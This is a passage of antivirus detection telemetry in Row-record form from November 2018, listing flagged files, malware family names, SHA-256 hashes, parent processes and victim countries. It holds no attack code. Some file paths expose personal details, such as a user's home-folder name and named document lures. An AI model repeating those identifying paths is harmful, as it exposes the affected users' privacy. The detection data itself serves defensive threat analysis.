  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=15984000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e5167b254eef885659c18982ff889a6ed014ccbd67b11f297c2c188762c880cb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='casino autobot.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa3264.2345\\casino autobot.exe', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='8eb2120570a10c18f117cdecc28c116186c0048d02882053ca3bd93e38dcfdf0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2233800, timestamp='2018-11-02T16:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Desktop\\nano\\1\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105710-776f26a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105710-776F26A0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dforrt.dll', filepath='\\\\?\\E:\\MATLAB7\\bin\\win32\\DFORRT.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='ca53261b76c180eafb9e0c3c966d5959a972e82281218693bb3f43b6a8ccfb25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:59:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='b05f7dfc5bbaf271f275eadc3290a47d0dae3335960c819f119bdc85ce1ca73f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+05GFiqTkEuwbgN1.1', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T20:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='connection_error.html', filepath='C:\\Program Files (x86)\\Avira\\Launcher\\pages\\it-IT\\connection_error.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='851268081d7e641b30e6489200194cd46c638953dc06c6ae3dc037e9ee7e134c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T12:54:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105518-5fe58125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105518-5FE58125', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0051218.exe', filepath='F:\\System Volume Information\\_restore{008B42F0-35EB-4774-9CDD-66CB64DF5DF2}\\RP28\\A0051218.exe', filesize=768000, name='W32/Sality.AT.#M1.#R1'), hash='e84164404e79bcbf418d54064e013dde4451443d649cf50ef2fca4ba5626a6a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='E:\\HBCD\\Programs\\DisableUSBWin7.exe', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nm1dy1c1phj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:40:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065157-6007a6ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-065157-6007A6ED', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072346-c5de37ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-072346-C5DE37EE', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar_2in1.exe', filepath='\\\\?\\C:\\Program Files\\soft\\Soft\\WinRAR\\WinRAR_2in1.exe', filesize=5248000, name='HEUR/AGEN.1000313.#M1.#R1'), hash='bc0ed263ea0f152e9a36baa4f8cc41914634b7e38369f740e6eda824be0ca0ee', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042149-56c879fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-042149-56C879FD', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:25:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230613-dce9092b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_394e3c36\\AVSCAN-20181102-230350-C43A23EB\\AVSCAN-20181102-230613-DCE9092B', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1c4299b4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1c4299b4.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='drq_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\drq_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='92bd6c4799f60795f93ebee3011591b2d80c7ecff2deaa881b651d6f05d6c5c4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:13:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073537-f430087e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_484312b5\\AVSCAN-20181102-073132-DA8E9234\\AVSCAN-20181102-073537-F430087E', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ranoro.exe', filepath='C:\\Users\\pr\\AppData\\Local\\Temp\\{F636CA0A-DE1E-B272-8646-9A5A6EAE4282}\\ranoro.exe', filesize=2112000, name='Adware/DealPly.c80ecc.#M1.#R1'), hash='c80ecc2af79cae96b54a857744a3b37d9708eced304e6e3d36168c4a6bedc49c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdl0311.htm', filepath='h:\\program files\\epson\\creativity suite\\easy photo print\\help\\_en_gb\\PDL0311.HTM', filesize=452000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='e3abfbe6b3b30e51e1798e6ff5e294f7cad4e06ffff885366b330b893e328385', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T21:44:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-31-004459/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:12:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290cc1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290cc1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dbc0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dbc0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:51:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='delegate_execute.exe', filepath='C:\\Users\\X\\AppData\\Local\\Maelstrom\\Application\\44.0.1.3\\delegate_execute.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='bc2516bca803dd187b4c8831aea92d938a8a3d7122e4f436e42f6ff3f5561c55', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:OTbXg\\\\\\/gmnEWe7BXK.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T06:10:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d6cc5901d78fdea9c07227028201572439ebf90a135aa85e0abe6b9dd710945f', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:46:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T07:37:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hdh.exe', filepath='C:\\Windows\\hdh.exe', filesize=192000, name='HEUR/AGEN.1021412.#M1.#R1'), hash='b144c88a07b644e8498b699f5ca074d632b300be7e31dad068f2b5ea31186365', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FF686DDB38ECE86BC825E748D0468F3A1518CF8A9D10C9C2BB56D87EFFD76329', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:18:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202340-87090962', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_690ab3e1\\AVSCAN-20181104-201541-5A869D8C\\AVSCAN-20181104-202340-87090962', filesize=64000, name='TR/Spy.64000.63.#M1.#R1'), hash='ffc50b193a6366a5f551fa5365535af36ea20167a5dd6da842da49cf6b0a76e4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:23:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b978', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b978', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ban tu kiem diem dang vien.doc.exe', filepath='F:\\CTD CTCC\\ĐẠO 17DZ\\BAN TU KIEM DIEM DANG VIEN.doc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f5e19d34e021240b6febe8510d02bd3de2616d3e80286e1bf998cd06ba1dbd48', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:44:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ebf9d5b15ba1f5e9c2468fed226b595a1ee357aff17ae3d6a47d9f5587f38c36', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EBF9D5B15BA1F5E9C2468FED226B595A1EE357AFF17AE3D6A47D9F5587F38C36', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ebf9d5b15ba1f5e9c2468fed226b595a1ee357aff17ae3d6a47d9f5587f38c36', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:15:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-181920-c58b51df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09da0715\\AVSCAN-20181104-172514-D97E5C6F\\AVSCAN-20181104-181920-C58B51DF', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='ff876ae39b6165cef367fa94c2fad8d9f92187851d490e3e38fe1a76cad6b91c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:19:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173453-99da7be7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76857da4\\AVSCAN-20181104-173322-8F3511AB\\AVSCAN-20181104-173453-99DA7BE7', filesize=256000, name='TR/Dropper.Gen.#M300.#R3643'), hash='ea8ca41a9a1f50a5907d9df55d913686d567a2e2444402b78e584d294c108df1', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:34:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:51:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T06:53:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher.exe', filepath='C:\\Users\\X\\Downloads\\aTube_Catcher.exe', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:06Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-211903-9c57afad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181101-211903-9C57AFAD', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4090412\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.halkg.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T17:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dialogs.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\plugins\\table\\dialogs\\dialogs.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:33Z'), dt=datetime.date(2018, 11, 2)),
